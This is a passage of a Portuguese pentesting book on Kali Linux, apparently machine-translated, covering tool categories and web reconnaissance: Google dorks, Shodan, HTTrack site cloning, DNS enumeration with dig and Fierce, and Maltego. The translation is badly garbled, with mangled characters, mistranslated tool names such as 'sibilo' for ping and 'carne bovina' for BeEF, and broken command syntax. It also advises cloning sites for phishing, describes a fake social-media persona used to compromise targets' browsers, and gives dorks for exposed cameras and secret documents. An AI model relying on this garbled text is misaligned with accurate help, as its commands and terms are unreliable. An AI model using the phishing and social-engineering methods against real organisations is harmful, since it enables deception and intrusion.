adaptador que pode ser configurado pelo Kali para ser colocado em modo promscuo.
Ferramentas de Explorao: Estas so ferramentas utilizadas para explorar
vulnerabilidades encontradas
em sistemas. Normalmente, a vulnerabilidade identificada durante uma
vulnerabilidade
Avaliao de um alvo.
Cheirando e falsificao: Estas so as ferramentas utilizadas para a captura de pacotes
de rede,
manipuladores de pacotes de rede, aplicaes de artesanato pacotes e web
spoofing. H tambm algumas aplicaes de reconstruo VoIP.
Mantendo o acesso: Manter ferramentas de acesso so usados uma vez um ponto de
apoio
estabelecida em uma rede ou sistema alvo. comum encontrar
sistemas comprometidos com vrios ganchos de volta para o atacante
fornecer rotas alternativas em caso de uma vulnerabilidade que usado por
o atacante encontrado e corrigido.
Engenharia reversa: Estas ferramentas so usadas para desativar um executvel
e programas de depurao. O objetivo da engenharia reversa est analisando
como foi desenvolvido um programa para que possa ser copiado, modificado, ou levar a
desenvolvimento de outros programas. Engenharia reversa tambm usado para
anlise de malware para determinar o que faz um executvel ou por pesquisadores
para tentar encontrar vulnerabilidades em aplicaes de software.








[30]
Captulo 1
Teste de Stress: Ferramentas de testes de estresse so utilizados para avaliar a quantidade
de dados a
sistema pode manipular. Resultados indesejados podem ser obtidos a partir de sobrecarga
sistemas como causando um dispositivo de controle de comunicao de rede para
abrir todos os canais de comunicao ou de um sistema de desligar (tambm conhecido
como
um ataque de negao de servio).
Hardware Hacking: Esta seo contm ferramentas de Android, que poderiam ser
classificada como ferramentas mveis, e Ardunio que so utilizados para a programao e
controlar outros pequenos dispositivos eletrnicos.
Forense: Ferramentas forenses so usados para monitorar e analisar o computador
trfego de rede e aplicaes.
Ferramentas de Relatrios: As ferramentas de relatrios so mtodos para entregar
informaes encontradas
durante um exerccio de penetrao.
Servios do Sistema: Isto onde voc pode ativar e desativar servios de Kali.
Os servios so agrupados em carne bovina, Dradis, HTTP, Metasploit, MySQL, e SSH.
Existem outras ferramentas includas no Kali Linux construir tais como web
navegadores, links rpidos para ajustar a forma como a construo Kali Linux visto
em
da rede, ferramentas de busca e outras aplicaes teis.




Resumo
Este captulo serve como uma introduo para Aplicaes Web Teste de Invaso
e uma viso geral sobre a criao de Kali Linux. Ns comeamos definindo as melhores prticas
para a realizao de servios de Teste de Penetrao incluindo risco de definio e diferenas
entre vrios servios. O principal argumento o de entender o que faz um
Penetrao teste diferente de outros servios de segurana, como fazer corretamente escopo
um nvel de servio e melhor mtodo para executar servios. Posicionando-se o direito
expectativas iniciais com um cliente potencial vai melhor qualificar a oportunidade
e simplificar o desenvolvimento de um mbito aceitvel de trabalho.
Este captulo continuou com o fornecimento de uma viso geral de Kali Linux. Os tpicos includos
como baixar a verso desejada de Kali Linux, maneiras de executar a instalao,
e uma breve viso geral de conjuntos de ferramentas disponveis. O prximo captulo ir cobrir como
executar
Reconhecimento em um alvo. Este o primeiro e mais importante passo na concretizao
Servios de testes de penetrao.
[31]
Reconhecimento
O termo Reconhecimento por definio vem da estratgia de guerra militar de
explorar alm da rea ocupada por foras amigas para obter informaes sobre o
inimigo para anlise ou ataque futuro. Reconhecimento de sistemas de computador semelhante
na natureza, ou seja, normalmente um verificador da penetrao ou hacker vai tentar aprender como
tanto quanto possvel sobre o ambiente de um alvo e caractersticas do sistema antes do lanamento
um ataque. Isto tambm conhecido como o estabelecimento de uma Pegada de um alvo.
Reconhecimento
normalmente passiva na natureza e em muitos casos no ilegal (no entanto, no somos
advogados e no podem oferecer aconselhamento legal) para executar, desde que voc no
completar um
handshake de trs vias com um sistema no-autorizado.
Exemplos de Reconnaissance incluir qualquer coisa de pesquisar um alvo no pblico
fontes, como o Google, a atividade de monitoramento empregado para aprender os padres de
operao,
e redes ou sistemas de varredura para coletar informaes, tais como fabricao
tipo, sistema operacional, e portas de comunicao abertas. Quanto mais informaes
pode ser recolhida sobre um alvo traz uma melhor chance de identificar o mais fcil e
mtodo mais rpido para alcanar uma meta de penetrao, bem como melhor mtodo para evitar
existente
segurana. Alm disso, alertando um alvo provavelmente ir causar algumas avenidas de ataque para
fechar
como uma reao preparao para um ataque. Slogan oficial da Kali diz isso melhor:
"O mais quieto voc se torna, mais voc capaz de ouvir"
Servios de reconhecimento deve incluir documentao pesado, porque foram encontrados dados
pode ser relevante em um momento posterior, no exerccio de penetrao. Os clientes tambm vo
querer
saber como os dados especficos foi obtida, e pedir referncias a recursos.
Exemplos so o que as ferramentas foram utilizadas para a obteno dos dados ou o que publicfacing
recursos, por exemplo, a consulta de pesquisa especfica no Google que foi submetido a
obter os dados. Informar um cliente "voc obteve o objetivo" no bom o suficiente,
porque a finalidade de um teste de penetrao identificar fraqueza para reparos futuros.
Reconhecimento
Objetivos de reconhecimento









Alvo de fundo: Qual o foco dos negcios do alvo?
Associados de alvo: Quem so os parceiros de negcios, fornecedores e clientes?
O investimento da Target em segurana: As polticas de segurana anunciado? O que
conscientizao de segurana da segurana de investimento em potencial, e do usurio?
Polticas comerciais e de segurana do alvo: Como que o negcio funcionar?
Onde esto os potenciais pontos fracos na operao?
O povo de alvo: Que tipo de pessoas trabalham l? Como que eles podem tornar-se
o seu trunfo para o ataque?
Definir metas: Quais so as menores metas de frutas penduradas? O que deve
ser evitado?
Rede da Target: Como as pessoas e os dispositivos se comunicam em
a rede?
Defesas do alvo: Que tipo de segurana est em vigor? Onde ela est localizada?
Tecnologias de alvo: Que tecnologias so usadas para e-mail, rede
trfego, armazenar informao, de autenticao, e assim por diante? Eles so vulnerveis?
Kali Linux contm um extenso catlogo de ferramentas intitulado Coleta de Informaes
especificados para os esforos de reconhecimento. Poderia encher um livro separado para cobrir
todas as ferramentas
e mtodos oferecidos para coleta de informaes. Este captulo se concentrar em vrios
tpicos de reconhecimento de aplicaes web e relacionar as melhores ferramentas encontradas no
Internet, bem como o oferecido pela Kali Linux.
A pesquisa inicial
Reconnaissance deve comear com a aprendizagem, tanto quanto possvel sobre as pessoas e
negcio associado ao alvo. Sun Tzu creditado com a frase ", conhecer o seu
inimigo "no livro, A Arte da Guerra. Como um verificador da penetrao, voc precisa conhecer o seu
alvo. Se o seu alvo passa a ser um site, voc deve olhar para todos os aspectos do que
site. Ele vai lhe dar uma melhor compreenso de como o site mantido e
executar. Grande Reconnaissance retorna mais vulnerabilidades possveis.
assustador a quantidade de informao est disponvel em fontes pblicas. Temos encontrado
o inimaginvel, como documentos classificados, senhas, relatrios de vulnerabilidade,
fotografia indesejvel e acesso a cmeras de segurana. Muitos testes de penetrao
objetivos do projeto comear com aproveitamento de informaes fora de fontes pblicas. Aqui esto
alguns
pontos de partida para a coleta de informaes a partir de fontes pblicas.
[34]
Captulo 2
Site da empresa
Existe uma grande quantidade de informaes valiosas que podem ser obtidas no site do alvo.
Listar a maioria dos sites corporativos sua equipe executiva, figuras pblicas e membros de
recrutamento e recursos humanos contatos. Estes podem tornar-se alvos para outra pesquisa
esforos e ataques de engenharia social.
Mais informaes valiosas podem ser obtidas por olhar para o que as outras empresas
so listados como parceiros, anncios de emprego atuais, informaes comerciais e de segurana
polticas. Reconhecimento de um parceiro de alto valor pode ser to importante quanto a
alvo principal, porque os parceiros podem fornecer uma nova fonte para a obteno de
inteligncia. Um exemplo comprometer um recurso contratado que gerencia
o helpdesk na sede do alvo.
O Robots.txt arquivo est disponvel e encontrado em sites publicamente que d
instrues para os robs web (tambm conhecido como o mecanismo de busca), sobre o que
e no visvel usando o Robots Exclusion Protocol. O Disallow: / afirmao
diz um navegador no visitar uma fonte, no entanto, uma Disallow pode ser ignorado, dando
uma inteligncia pesquisador sobre o que um alvo espera no divulgar ao pblico.
Para ver o Robots.txt arquivo, encontrar o Robots.txt arquivo no diretrio raiz de um alvo
site. Por exemplo, adicionando o Robots.txt arquivo para Facebook ficaria como mostrado
na imagem seguinte:
[35]
Reconhecimento
Fontes de histria Web
Existem verses arquivadas da maioria dos sites pblicos disponveis no fontes, como o
Wayback Machine em archive.org. Informao de interesse podem ser encontrados em mais velhos
verso do site de um alvo, como organogramas desatualizados, nmeros de telefone,
inteligncia do cliente, sistemas de informao listada nos campos, tais como ver fonte ou
/ Robots.txt, Parcerias de negcios mais velhos, vulnerabilidades corrigidas em verses posteriores,
e outros dados teis, o alvo no quer na verso de site atual.
importante entender que a informao publicamente disponvel difcil de remover
completamente, fazendo com que as fontes histricas de um lugar valioso para a pesquisa de
reconhecimento.
Para acessar o Wayback Machine, abrir o navegador web e navegue at
http://archive.org, Voc ver o Internet Archive Wayback Machine
no meio da pgina, como mostra a imagem a seguir:
[36]
Captulo 2
Digite a URL que voc gostaria de navegar e ver se todos os arquivos foram capturados.
A histria do arquivo pode ser visto aqui, como mostrado na imagem seguinte:
[37]
Reconhecimento
Como um verificador da penetrao, esta uma ferramenta valiosa, pois no deixar provas de
Reconhecimento em seu alvo. Na verdade, o seu alvo nunca sequer tocou usando este
ferramenta. Toda a informao foi arquivada em linha no Wayback Machine. O
duas prximas imagens mostram www.lancope.com em 2002 em comparao a 2013:
[38]
Captulo 2
RIR uma organizao que gerencia a alocao de recursos e registro de IP
dentro de uma regio especfica do mundo. H cinco principais RIRs: a EUA, Canad,
e em partes da regio do Caribe pode ser encontrada em www.arin.net. Voc pode reunir
informaes sobre um alvo, como Lancope, como visto na imagem seguinte:
Registros Regionais da Internet (RIRs)
[39]
Reconhecimento
Eletrnico coleta de dados, anlise e
Retrieval (EDGAR)
O banco de dados EDGAR contm declaraes de registro, relatrios peridicos, e outros
formas de informao sobre as empresas desde 1994. As empresas nos Estados Unidos da
Amrica so obrigados por lei a apresentar, e todas as informaes esto disponveis ao pblico. O
duas seguintes imagens mostram documentos pblicos encontrados durante a pesquisa Lancope:
[40]
Captulo 2
Recursos de mdia social
A mdia social est em toda parte, e na maioria dos casos, acessvel ao pblico. A maioria das
pessoas tem
um Facebook, LinkedIn, blogs, ou outras formas de contas nuvem contendo valioso
informaes. Esta informao pode ser usada como um meio de inteligncia engenharia social
de pessoal atual ou anterior de um alvo. Um exemplo a pesquisa Glassdoor.com para
identificar os funcionrios anteriores que esto descontentes, com base no feedback.
H muitas pessoas que encontram os recursos da web como Maltego (encontrado em Kali Linux)
que pode pentear meios populares sociais, registros pblicos, e sites de recrutamento de trabalho
para
impresso digital de um indivduo com base em informao limitada, como um primeiro e ltimo
nome.
Um pesquisador pode coletar informaes como em todos os lugares um indivduo vive,
feito negcios, pessoas com as quais eles se socializar, interesses especiais, esporte favorito
equipes, e outros dados teis para futuros ataques de pesquisa e engenharia social.
Confiana
A maioria das pessoas so naturalmente confiante e assumir informaes publicadas em fontes
pblicas
real. Para testar este conceito, os autores deste livro criou uma falsa pessoa atravs sociais
mdia e fingiu ser uma nova contratao para uma empresa-alvo. A pessoa seria falso
se tornar amigos com os associados de nossa meta, carto postal de frias falsos que esto ligados
para uma Carne sistema projetado para comprometer navegadores de Internet mais vulnerveis (com
carne bovina
coberto mais tarde neste livro), e informaes confidenciais capturado a partir comprometida
sistemas. Ns fomos capazes de mapear toda a organizao, obter informaes sobre a rede,
e ainda teve hardware embarcado para ns sem o nmero de e-mail ou telefone interno.
Nossa pessoa falsa, Emily Williams no real, ofertas de emprego ainda recebeu, foi fornecido dentro
informao e acesso a eventos organizados pelo alvo. Informao poder, e
as pessoas vo dar a um solicitador que parece que eles podem ser confiveis.
Mais informaes sobre este projeto podem ser encontradas
em:
http://www.thesecurityblogger.com/?p=1903
Postagens de
emprego
Postagens de emprego contm uma riqueza de conhecimentos sobre o ambiente de um alvo.
Anncios de emprego
pode fornecer mais detalhes sobre que tipo de sistemas so instalados, que os administra, como
grande o pessoal , e nvel de habilidade dos funcionrios. Representantes de Recursos Humanos
so
tipicamente ansioso para compartilhar informaes com um novo potencial de aluguer, o que pode ser
usado como
uma avenida a informao privilegiada. Um exemplo alvo de um anncio de emprego para um
Orculo
desenvolvedor para entender o hardware, verso do Oracle, os nomes dos existentes e
administradores anteriores, as questes existentes de operao, falhas de segurana e mtodos para
acesso, como perguntar "pode administradores trabalhar em casa, e como eles acessam
os sistemas? "
[41]
Reconhecimento
Outra via de avaliar o salrio de um trabalho esperado, benefcios e taxa de rotatividade no
placas do trabalho populares. Estas tendncias podem descobrir novos vetores de ataque.
Glassdoor.
com um exemplo de uma fonte popular para este tipo de dados.
Localizao
O investimento em segurana ciberntica para um alvo geralmente pode ser determinado com base
em
o nvel de segurana fsica. Seria de supor um edifcio com cercas e armado
guardas teria um investimento maior em segurana ciberntica do que um alvo localizado dentro
um edifcio pblico. Fontes de mapeamento on-line, como o Google Maps pode ajudar a identificar
onde a segurana fsica implementada, e as tendncias sobre a forma como as pessoas se
deslocam de e para
a partir do alvo. Outras reas de interesse so a identificao de onde um verificador da penetrao
poderia acampar para procurar redes sem fio, e os possveis mtodos para derivao
controles de acesso, tais como trajes e emblemas usados para obter acesso fsico.
Shodan
Shodan um motor de busca que pode identificar um dispositivo especfico, como o
computador,
router, um servidor, usando uma variedade de filtros, tais como os metadados de faixas do
sistema.
Por exemplo, voc pode procurar por um sistema especfico, como um Cisco 3850, correndo
uma verso do software, tais como IOS verso 15.0 (1) EX.
[42]
Captulo 2
O exemplo a seguir um caso de uso em busca de qualquer sistema SCADA com pblico
Acesso Internet, o que, em teoria, no deveria existir no entanto, pode mostrar Shodan
isto no necessariamente verdade. Coisas de controle sistemas SCADA, como gerenciamento de
energia
e tratamento de gua, de modo que a identificao de sistemas acessveis pblicas extremamente
ruim!
[43]
Reconhecimento
Google hackers
Google hacking a forma mais comum de motor de busca de reconhecimento de web
aplicaes. Google Hacking usa operaes avanadas no motor de busca Google
para localizar seqncias especficas de texto dentro de resultados de pesquisa. Filtros de pesquisa
pode se concentrar em
verses especficas de aplicaes web vulnerveis, tais como Desenvolvido por Apache no
intitle: "index of" operador ou identificar arquivos de log como ws_ftp.log, Contendo
informaes de IP sensvel. A seguir alguns screenshots demonstrar usando um Google
procurar Linksys para encontrar cmeras Linksys publicamente disponveis. A primeira imagem
mostra o comando de pesquisa seguido de alguns exemplos de resultados de emisso da pesquisa.
A ltima imagem mostra um avano de cmera que poderia ser encontrado usando esta tcnica.
[44]
Captulo 2
Algumas consultas exemplo da pesquisa so os
seguintes:



Identifica documentos sensveis: intext: classificadas secreto
Identifica Linksys GUIs de gerenciamento de cmera (cuidado: voc pode no gostar
o que voc encontrar): inurl: main.cgi
Identifica Nessus relatrios para encontrar sistemas vulnerveis: inurl: NESSUSXXXXXXXX
Para mais informaes sobre Google hacking, confira um bom livro intitulado Google
Hacking para testadores de penetrao por Johnny Long, bem como o seu website em http://
johnny.ihackstuff.com.
O Google Hacking Banco de Dados (GHDB) criado por Johnny Long de Hackers Para
Caridade (http://www.hackersforcharity.org/), a fonte definitiva para o Google
consultas de pesquisa. Procura por nomes de usurio, senhas, sistemas vulnerveis e exploits
foram capturados e categorizados por aficionados de hackers do Google. Os aficionados
que categorizou as buscas do Google so afetuosamente conhecido como idiotas do Google.
[45]
Google Hacking Banco de Dados
Reconhecimento
Para acessar o GHDB, navegue at http://www.exploit-db.com/google-dorks/.
Voc vai ver as ltimas pesquisas GHDB listados na pgina web. Voc pode clicar em qualquer
da pesquisa questiona a si mesmo.
Voc vai encontrar diferentes categorias de pesquisas na parte inferior da pgina que tem
foi salvo. No exemplo a seguir, desloque-se para a categoria Arquivos Vulnervel
e selecione a consulta Assistente Carregador ionCube.
[46]
Captulo 2
Podemos selecionar a consulta de pesquisa, e vai trazer-nos para o Google, a realizao do
mesma consulta de pesquisa.
[47]
Reconhecimento
O exemplo anterior mostra Google encontrou alguns resultados. O ionCube Carregadeira
, aparentemente, no configurado ou mal configurado. O ionCube Carregadeira , na verdade, um
grande pedao de software que protege o software escrito em PHP de serem visualizados ou
mudou de computadores no autorizados. No entanto, neste caso, os administradores da esquerda
assistente padro rodando sem nenhuma configurao.
Quando clicamos no primeiro link, temos a tela inicial para configurar o software.
O GHDB essencialmente transforma o Google em um scanner de aplicaes web limitado para
um
Verificador da penetrao. Neste caso, um bom software que pode aumentar a segurana pode
agora
potencialmente ser usado contra um servidor web por um invasor.
Pesquisando redes
Muitas pessoas no entendem o verdadeiro propsito de pesquisar a rede de um
alvo antes de lanar um ataque. Amadores Penetrao Testers compreender a necessidade
para escolher um alvo antes que eles possam realizar um teste de penetrao. Depois de tudo, um
Penetrao
Tester precisa de um lugar em que para apontar o seu arsenal de ferramentas. Muitos amadores
vontade
executar o Nmap, varreduras de ping, ou outras ferramentas ruidosas para determinar o que esto
disponveis alvos
perturbando o ambiente, o que mais tarde produz resultados pobres.
Reconhecimento de rede sobre a seleo de um alvo. A segurana da rede experiente
profissional ir dizer-lhe boa Reconnaissance sobre a seleo de uma meta de qualidade,
passar a maior parte do seu tempo a ver, em vez de agir. O primeiro passo de
cada teste de penetrao precisamente encontrar e selecionar as metas de qualidade.
[48]
Captulo 2
Do ponto de vista do cliente, Penetrao Testers vai encontrar indivduos
que a satisfao do ganho em parar testadores de penetrao de provar o seu valor
como empregados, bem como a forma como ela est bem preparada para ataques
cibernticos. Ele
altamente recomendvel que um verificador da penetrao profissional no
entrar em conflito com o pessoal do cliente, enquanto os servios de penetrao esto sendo
realizada. Um verificador da penetrao deve se concentrar em conscincia da segurana,
e revelar o que vulnerabilidades existem com o mnimo de interao
com o pessoal do alvo durante um compromisso de servio.
A seguir, so as melhores ferramentas disponveis no Kali para aplicao web
Reconhecimento. Outras ferramentas podem estar disponveis para aplicaes web
ou
diferentes tipos de destino no entanto, o foco deste captulo permitir que um
leitor para avaliar alvos baseados em aplicativos web.
HTTrack - clonar um site
HTTrack uma ferramenta construda em Kali. O objetivo do HTTrack copiar um site.
Ela permite que um verificador da penetrao de olhar para todo o contedo de um site, todas as
suas pginas,
e os arquivos off-line, e em seu prprio ambiente controlado. Alm disso, vamos usar
HTTrack para ataques de engenharia social em captulos posteriores. Ter uma cpia de um site
pode ser usado para desenvolver sites phishing falsos, os quais podem ser incorporados em outros
Conjuntos de ferramentas de teste de penetrao.
Para usar o HTTrack, abra um Terminal janela e digite apt-get install httrack
como mostrado na figura a seguir.
Algumas verses de Kali no tem este built-in.
[49]
Reconhecimento
Voc vai querer criar um diretrio para armazenar seu site copiado. A sequncia
imagem mostra um diretrio criado nomeado mywebsites usando o mkdir comando.
Para iniciar HTTrack, tipo httrack na janela de comando e dar ao projeto
um nome, como mostrado na imagem seguinte:
O prximo passo selecionar um diretrio para salvar o site. O exemplo na
imagem seguinte mostra a pasta criada no passo anterior / Root /
mywebsites, Usado para o diretrio:
Digite a URL do site que voc deseja capturar. O exemplo a seguir
imagem mostra www.drchaos.com. Isso pode ser qualquer site. A maioria dos ataques
usar um site acessado por clientes de seu alvo, como social popular
sites de mdia ou sites internos do alvo.
As prximas duas opes so apresentadas sobre o que voc quer fazer com o
local capturado. Opo 2 o mtodo mais fcil, que um stio de espelho com
um assistente, como mostrado na imagem seguinte:
[50]
Captulo 2
Em seguida, voc pode especificar se voc quiser usar um proxy para iniciar o ataque. Voc
tambm pode
especificar o tipo de arquivos que voc deseja fazer o download (o exemplo a seguir
imagem mostra *para todos os arquivos). Voc tambm pode definir as opes de linha de
comando
ou bandeiras voc pode querer definir. O exemplo na imagem seguinte mostra nenhum
opes adicionais.
Antes httrack executado, ele ir mostrar o comando que est sendo executado. Voc pode usar este
comando no futuro, se voc deseja executar httrack sem passar pelo assistente
novamente. As duas imagens seguintes mostram hhtrack clonagem www.drchaos.com:
[51]
Reconhecimento
Depois de terminar a clonagem do site, navegue at o diretrio onde voc
salvou. L dentro, voc vai encontrar todos os seus arquivos e pginas da web, como
mostra a
tela a seguir:
Agora voc est pronto para pesquisar o site do seu alvo e, eventualmente, construir
uma
ferramenta de penetrao personalizado ou explorar o acesso do usurio a um site
clonado.
O sibilo e traceroute comandos so boas maneiras de descobrir informaes bsicas
sobre o seu destino. Quando a informao viaja atravs de redes, ele no costuma ir
diretamente da origem para o destino. Geralmente atravessa vrios sistemas, tais
como roteadores, firewalls e outros sistemas de computador antes que ele chegue ao seu destino.
O traceroute comando identifica cada sistema os dados viajam atravs de, juntamente com
o tempo que leva para que os dados para se deslocar entre os sistemas. A ferramenta instalada em
cada
sistema operacional moderno. Para a maioria dos alvos de alto valor, o sibilo e traceroute
comandos provavelmente ser desativada, e uso excessivo destes servios
a maioria dos alertas de disparo provveis sobre os sistemas de segurana de rede. Muitos firewalls
ou outros
criao de sistemas que no responder s rotas nmero B24RYE. Se os sistemas no respondem
para traceroute, Usando isso tambm excessivamente pode desencadear eventos de segurana. Estas
ferramentas so
barulhento, e quando usados indiscriminadamente, eles vo disparar alarmes e logs. Se o seu objetivo
est a ser furtivo, voc tem apenas sido derrotada, dando o seu alvo a oportunidade de
configurar e implementar contramedidas contra o seu teste de penetrao.
Uma varredura ICMP envia simplesmente fora uma solicitao de eco e procura por uma resposta. Se
a resposta
retornado, ento, como um verificador da penetrao, voc sabe que h um possvel alvo. O
problema com varreduras ICMP ICMP que normalmente bloqueado pela maioria dos firewalls.
Que
significa qualquer scans de fora indo para uma rede de destino interno ser bloqueada pelo
um scanner de ICMP.
O sibilo comando a forma mais bsica para iniciar uma varredura ICMP. Basta digitar
em sibilo seguido por um nome de host ou endereo IP para ver o que vai responder ao ICMP
echo pedido. A figura a seguir mostra um ping www.google.com:
Tcnicas de reconhecimento de ICMP
[52]
Captulo 2
Se voc receber qualquer resposta de volta, voc vai saber que o seu anfitrio est vivo. Se voc
receber qualquer
tempos de espera, o seu pedido ICMP est sendo bloqueado, ou nenhum host de destino recebeu
seu pedido.
O problema com o sibilo comando que ele s permite a utilizao de ICMP para
verificar em um host de cada vez. O fping comando permitir que voc pingue mltipla
hosts com um nico comando. Ele tambm ir permitir que voc leia um arquivo com mltiplas
nomes de host ou endereos IP e envi-los usando requisies ICMP pacotes.
Para usar o fping comando para executar uma varredura ICMP em uma rede, emitir o
seguinte comando:
pedaos de rede / host Fping-asg
fping-asg 10.0.1.0/24
Embora o umabandeira ir retornar os resultados atravs do endereo IP de hosts ao vivo s, o
sbandeira
exibe estatsticas sobre a digitalizao, o gconjuntos de bandeira fping no modo bastante, o que
significa que
faz mostrar ao usurio o status de cada varredura, apenas o resumo, quando se completou.
O Nmap fornece resultados semelhantes, como o fping comando.
A maioria dos alvos de alto valor tem um nome DNS associado a uma aplicao. DNS
nomes de torn-lo mais fcil para que os usurios acessem um determinado servio e adicionar
uma camada de
profissionalismo ao seu sistema. Por exemplo, se voc quiser acessar o Google para
informaes, voc poderia abrir um navegador e digitar 74.125.227.101 ou tipo www.
google.com.
Tcnicas de reconhecimento DNS
[53]
Reconhecimento
Informaes de DNS sobre um alvo em particular pode ser extremamente til para uma penetrao
Tester. DNS permite que um verificador da penetrao para mapear sistemas e subdomnios. Mais
velho
Ataques DNS transferir um arquivo de zona de um DNS autoritrio, permitindo que o testador
examinar o contedo completo do arquivo de zona para identificar alvos potenciais. Infelizmente,
maioria dos servidores DNS atuais no permitem transferncias de zona no autenticado. No
entanto, todos
no est perdido! DNS por sua prpria natureza um servio que responde a consultas e, portanto,
um invasor pode usar uma consulta de lista de palavras que contm centenas de nomes com DNS
servidor. Este vetor de ataque uma tarefa extremamente demorada, no entanto, a maioria
aspectos pode ser automatizado.
Escavao (Domnio informaes groper) um DNS mais popular e amplamente utilizado
Ferramentas de reconhecimento. Ele consulta os servidores DNS. Para usar Dig, abrir um prompt de
comando
e tipo cavar e hostname, em que hostname representa o domnio de destino. Escavao
ir utilizar os seus sistemas operacionais configuraes de DNS padro para consultar o nome do
host.
Voc tambm pode configurar Dig para consultar servidores DNS personalizado, adicionando @ <IP>
ao
comando. O exemplo na imagem a seguir ilustra usando Dig em
www.cloudcentrics.com.
[54]
Captulo 2
O -T opo Dig vai delegar uma zona DNS para usar o nome de autoridade
servidores. Ns digite dig-t ns cloudcentrics.com no exemplo da
tela a seguir:
Vemos a partir dos resultados que temos dois servidores DNS autorizados para o domnio
www.cloudcentrics.com, Pois eles so ns3681.hostgator.com e ns3682.
hostgator.com.
Parabns, voc acaba de encontrar o servidor DNS autorizado para o seu
alvo de DNS.
Identificao do alvo DNS
Agora que voc j encontrou os servidores DNS autoritativos para um domnio, voc pode
quero ver o que anfitries tm entradas sobre esse domnio. Por exemplo, o domnio
drchaos.com pode ter vrios hosts. tal como cloud.drchaos.com,correio. drchaos.
com,sharepoint.drchaos.com. Todos estes podem ser potenciais aplicaes e
alvos potencialmente alto valor.
Antes de comear a escolher aleatoriamente anfitries, devemos consultar o servidor DNS para ver
que existem entradas. A melhor maneira de fazer isso perguntar o servidor DNS para nos dizer. Se
o
Servidor DNS est configurado para permitir transferncias de zona, que vai nos dar uma cpia de
todas as suas entradas.
[55]
Reconhecimento
Kali navios com uma ferramenta chamada Fierce. Fierce ir verificar para ver se o servidor DNS
permite
transferncias de zona. Se so permitidas transferncias de zona, Fierce ir executar uma
transferncia de zona e
informar o usurio sobre as entradas. Se o servidor DNS no permite transferncias de zona, Fierce
pode ser configurado para nomes de host de fora bruta em um servidor DNS. Fierce concebido
como
uma ferramenta de reconhecimento antes de usar uma ferramenta que requer que voc sabe os
endereos IP,
como o nmap.
Para usar Fierce, navegue at Coleta de Informaes |Anlise DNS |Fierce.
Fierce ser carregado em uma janela de terminal, como mostrado na imagem seguinte.
Para executar o Feroz script, digite o seguinte comando:
fierce.pl-dns thesecurityblogger.com
[56]
Captulo 2
O domnio thesecurityblogger.com, Mostrado na imagem anterior, tem
alguns servidores associados. Ns realizamos nossa tarefa. No entanto, voc pode
ver Fierce fracassada de completar uma transferncia de zona. Fierce vai tentar a fora bruta de uma
zona
transferir usando uma lista de palavras ou arquivo de dicionrio, se tiver um definido. Ns no o fez,
porque o objetivo desta seo determinar o que existe anfitries no domnio, no
necessariamente neste momento realizar um ataque de transferncia de zona. No entanto, se o seu
objetivo
mais abrangente do que a segmentao de aplicaes web, voc pode querer explorar mais este
em seu prprio pas.
Agora podemos atingir um determinado host e usar ferramentas como o Nmap para prosseguir em
mapeando o nosso alvo. Um aspecto importante do uso Fierce est selecionando um alvo
usando muito pouco trfego de rede, o que importante para evitar a deteco. Iremos
usar o Nmap para reunir mais informaes sobre o nosso alvo mais adiante neste captulo.
Grficos de coleta de informaes - Maltego
Maltego uma ferramenta de reconhecimento incorporada Kali desenvolvido por Paterva. um
ferramenta Reconnaissance multiuso que pode reunir informaes usando aberto e
informao pblica na Internet. Tem alguns embutido Reconnaissance DNS, mas
muito mais profundo em fingerprinting seu alvo e recolha de informaes sobre
los. Leva as informaes e exibe os resultados em um grfico para anlise.
Para iniciar Maltego, navegue at Aplicao Menu em Kali, e clique no Barrilha menu.
Em seguida, selecione Coleta de Informaes |Anlise DNS |Maltego.
O primeiro passo ao iniciar Maltego registr-lo. Voc no pode usar o
aplicao sem registro.
[57]
Reconhecimento
Quando voc completar o registro, voc vai ser capaz de instalar e comear a usar Maltego
da aplicao.
Maltego tem vrios mtodos de coleta de informaes. A melhor maneira de usar
Maltego aproveitar o assistente de inicializao para selecionar o tipo de informao
que pretende reunir. Os usurios experientes pode querer comear com um grfico em branco ou
pular
o assistente todos juntos. O poder de Maltego que ele permite que voc observar visualmente o
relao entre um domnio, organizao e pessoas. Voc pode se concentrar em torno de um
organizao especfica, ou olhar para uma organizao e suas parcerias relacionados de
Consultas DNS.
Dependendo das opes de digitalizao escolhido, Maltego permitir que voc execute
o
seguintes tarefas:




Associar um endereo de e-mail para uma pessoa
Sites associados a uma pessoa
Verifique o endereo de e-mail
Rena detalhes do Twitter, incluindo geolocalizao de fotos
[58]
Captulo 2
A maioria dos recursos so auto-explicativos e incluem como eles so usados sob a
descrio caracterstica. Maltego comumente utilizado para coletar informaes e, por vezes,
usado como o primeiro passo, durante um ataque de engenharia social.
Nmap
Nmap significa Network Mapper, e usado para fazer a varredura de hosts e servios na
uma rede. Nmap tem recursos avanados que podem detectar diferentes aplicaes
rodando em sistemas, bem como servios e recursos de impresso digital OS. um
dos scanners mais utilizados rede tornando-se muito eficaz, mas tambm muito
detectvel. Recomendamos o uso do Nmap em situaes muito especficas para
evitar disparar os sistemas de defesa de um alvo.
Para mais informaes sobre como usar o Nmap, consulte http://nmap.org/.
Alm disso, Kali vem carregado com Zenmap. Zenmap d Nmap uma grfica
interface com o usurio (GUI) para executar comandos. Embora existam muitos puristas que
vontade
dizer-lhe a verso de linha de comando a melhor verso por causa de sua velocidade e
flexibilidade, Zenmap j percorreu um longo caminho e incorporou a maior parte do Nmap
recursos. Zenmap tambm oferece recursos exclusivos no oferecidos no Nmap, como
desenvolvimento de representaes grficas de um varrimento, que pode ser usado mais tarde
por outra
sistemas de informao.
[59]
Reconhecimento
Para abrir Zenmap, ir para o Backtrack menu. Navegue at Mapeamento de Informaes |
Anlise DNS, e lanamento Zenmap.
Voc vai notar sob o Perfil menu que existem vrias opes para determinar
que tipo de verificao que gostaria de executar, como mostrado na imagem seguinte:
[60]
Captulo 2
O primeiro passo criar um novo perfil. Um perfil em Zenmap permite uma penetrao
Tester para criar o tipo de verificao para executar e que opes diferentes para incluir.
Navegue at a Perfil menu e selecione Novo perfil ou Command para criar um novo
perfil, como mostrado na imagem seguinte:
Quando voc seleciona Novo perfil ou de comando, o editor de perfis ser iniciado. Voc ir
precisa dar o seu perfil de um nome descritivo. Por exemplo, voc pode ligar para o perfil Meu
First Scan ou qualquer outra coisa que voc gostaria.
Opcionalmente, voc pode dar o perfil de uma descrio. Durante o curso de usar
Zenmap voc provavelmente ir criar muitos perfis e fazer vrios exames. A natural
reflexo pode ser a de excluir perfis postar execuo. Aqui est uma palavra de conselho: perfis
no tomar qualquer espao e vir a calhar quando voc quer recriar algo. Ns
recomendar sendo extremamente descritivo em nomes de perfil e chegar a um
mtodo de nomeao padro. Eu comeo toda a minha descrio de perfil com a data, hora,
